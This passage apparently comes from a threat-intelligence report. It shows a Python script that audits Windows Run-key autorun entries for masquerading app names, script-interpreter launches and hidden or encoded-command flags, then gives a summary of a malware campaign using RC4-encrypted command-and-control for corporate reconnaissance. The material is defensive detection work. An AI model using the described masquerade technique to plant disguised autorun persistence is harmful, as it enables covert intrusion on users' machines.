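    """First token of a Windows command line, honouring a quoted path; lower-cased."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        exe = command[1:end] if end > 0 else command[1:]
    else:
        exe = command.split(" ", 1)[0]
    return exe.lower()


def assess_run_entry(name: str, command: str) -> list[str]:
    """Reasons an autorun value looks like a masquerade or a script loader; empty if clean."""
    reasons = []
    exe = executable_of(command)
    base = exe.rsplit("\\", 1)[-1]
    for app, (expected_exe, expected_dirs) in EXPECTED_AUTORUNS.items():
        if app in name.lower() and (base != expected_exe or not any(d in exe for d in expected_dirs)):
            reasons.append(f"value name mimics {app} but runs {exe}")
    if base in INTERPRETERS:
        reasons.append(f"autorun launches a script interpreter ({base})")
    if HIDDEN_FLAGS.search(command):
        reasons.append("hidden-window or encoded-command flags present")
    return reasons


def audit_run_keys(entries: dict) -> dict:
    """Map each suspicious value name to its reasons; clean entries are omitted."""
    return {name: r for name, cmd in entries.items() if (r := assess_run_entry(name, cmd))}


def read_run_keys() -> dict:
    """Live values of the HKCU Run key on Windows; empty elsewhere so the script still runs."""
    try:
        import winreg
    except ImportError:
        return {}
    entries = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run") as key:
        i = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, i)
            except OSError:
                break
            entries[name] = str(value)
            i += 1
    return entries


if __name__ == "__main__":
    live = read_run_keys()
    for name, reasons in audit_run_keys(live or SAMPLE_RUN_ENTRIES).items():
        print(f"{name}: " + "; ".join(reasons))
```

The name-versus-binary check is the one that matters for this campaign: a value called "Discord" that actually starts pythonw.exe is exactly the masquerade described above, and it is invisible to a check that only looks at the value name. HKLM Run, RunOnce and the per-user Explorer policy keys carry the same kind of entries and can be fed through the same function.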
INCIDENT DETAILS
Type: malware campaign
Motivation: financial gain, espionage
Impact: data compromised: operating system details, running processes, network configurations, user privileges, installed security tools (corporate networks, domain-joined systems); operational impact: potential access to Active Directory, internal resources, and sensitive data
Data breach: operating system details, running processes, network configurations, user privileges, installed security tools; sensitivity: high (corporate reconnaissance data); data encryption: RC4 for C2 communications
